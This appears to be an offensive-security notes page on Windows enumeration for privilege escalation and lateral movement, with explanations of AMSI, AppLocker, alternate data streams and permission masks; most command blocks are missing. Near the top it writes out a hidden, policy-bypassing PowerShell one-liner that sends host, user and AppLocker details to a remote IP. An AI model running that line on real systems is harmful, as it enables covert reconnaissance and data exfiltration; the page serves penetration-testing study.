TwitterBlog

Windows

Introduction

This section contains some useful commands that will help you enumerate the Windows system, obtaining helpful information for a later Privilege Escalation or Lateral movements.

General information exfiltration

C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe -exec bypass -nop -w hidden -c iwr -UseBasicParsing -Uri "http://10.10.10.4/index.html?h=$(hostname)?x64=$([Environment]::Is64BitProcess)?u=$($env:USERNAME)?cd=$(Get-Location)?ip=$((Test-Connection -ComputerName (hostname) -Count 1).IPV4Address.IPAddressToString)?clm=$($ExecutionContext.SessionState.LanguageMode)?AppLockerS=$(Get-Service -Name "AppIDSvc" | Select-Object -ExpandProperty Status)?AppLockerR=$(Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollectionTypes| Format-List| Out-String)"

PowerShell History

c:\\Users\\<USER>\\AppData\\Roaming\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt

User and group enumeration

whoami
echo %username%

Privileges

Displays the current user name and groups to which the user belongs and the security identifiers (SIDs), notifications and privileges for the current user's access token.

whoami /all

Enumerate the SE privileges of the current user

Groups

Operative system

  • Architecture:

  • General information:

  • Environment variables:

  • Hostname & Domain

Network enumeration

  • Hardcoded domains:

The file /etc/hosts also exist on Windows under the following path.

  • Port enumeration:

  • Display routing table:

  • Network configuration:

  • Shares:

  • SMB Signing enabled

  • View computers on your network:

  • Status Firewall / AV / Windows Defender

  • WiFi Passwords: On windows 10 we can obtain WiFi Passwords for each AP that the computer has ever connected.

  • Show ARP tables:

Constrained Language Enabled (CLM)

Constrained Language Mode is a security feature designed to restrict the capabilities of PowerShell scripts, making them more secure and less prone to exploitation. When Constrained Language Mode is enabled, PowerShell restricts the use of certain language elements and cmdlets to help prevent potential malicious activities.

To bypass this countermeasure go to Countermeasure Evasion - CLM

AMSI

AMSI stands for Antimalware Scan Interface, and it is a security feature in Windows designed to help protect against script-based malware.

There are several ways to check if AMSI is enabled:

To bypass this countermeasure go to Countermeasure Evasion - AMSI

AppLocker

AppLocker is a security feature in Windows operating systems that allows administrators to control which applications and executable files are allowed to run on a system. It provides a way to define and enforce application whitelisting policies, helping organizations enhance their security by preventing the execution of unauthorized or potentially malicious software.

You can check if AppLocker is enabled with the following command.

Obtain AppLocker rules:

To bypass this countermeasure go to Countermeasure Evasion - AppLocker.

Files Enumeration

PowerShell History

Disks

There are several ways to obtain the mounted disks on the system.

Alternate Data Streams

Alternate Data Streams (ADS) are a file attribute only found on the NTFS file system. In this system, a file is built up from a couple of attributes, one of them is $Data, also known as the data attribute. Looking at the regular data stream of a text file there is no mystery. It simply contains the text inside the text file. But that is only the primary data stream.

This one is sometimes referred to as the unnamed data stream since the name string of this attribute is empty ( "" ). So any data stream that has a name is considered an alternate.

Find Data Alternate Streams in a directory.

If you want to search a directory or drive for ADS you can use this command in the root of the target:

Adding data to an alternate data stream.

Read Alternate Data Streams.

Permissions

Windows permission terminology can be quite challenging to understand. In this subsection, you will find how to obtain the attributes and their meaning.

Simple Rights

Mask
Permission

F

Full access

M

Modify access

RX

Read and execute access

R

Read-only access

W

Write-only access

Specific Rights

Mask
Permission

D

Delete

RC

Read control

WDAC

Write DAC

WO

Write Owner

S

Synchronize

AS

Access System security

MA

Maximum Allowed

GR

Generic Read

GW

Generic Write

GE

Generic Execute

GA

Generic All

RD

Read Data / List Directory

WD

Write Data / Add File

AD

Append Data / Add subdirectory

REA

Read Extended Attributes

WEA

Writer Extended Attributes

X

Execute

DC

Delete Child

RA

Read Attributes

WA

Write Attributes

Inheritance righsts (Applied only to directories)

Mask
Permission

OI

Object Inherit

CI

Container Inherit

IO

Inherit Only

NP

Do not propagate inherit

I

Permission inherited from parent container

Service rights

The first letter represents Allow (A) the opposite of Deny which would be represented by a (D).

Mask
Permission
Meaning

CC

SERVICE QUERY CONFIG

Ask the SCM for the service’s current configuration

LC

SERVICE QUERY STATUS

Ask the SCM for the service’s current status

SW

SERVICE ENUMERATE DEPENDENTS

List dependent services

LO

SERVICE INTERROGATE

Ask the service its current status

CR

SERVICE USER_DEFINED CONTROL

Send a service control defined by the service’s author

RC

READ CONTROL

Read the security descriptor on this service.

RP

SERVICE START

Start the service

WP

Service stop

Stop the service

DT

Service Pause continue

Pause or continue the service

List Installed HotFixes

List all installed patches on the system.

Running processes

Scheduled Tasks

List/enumerate all the scheduled tasks present on the system.

Last updated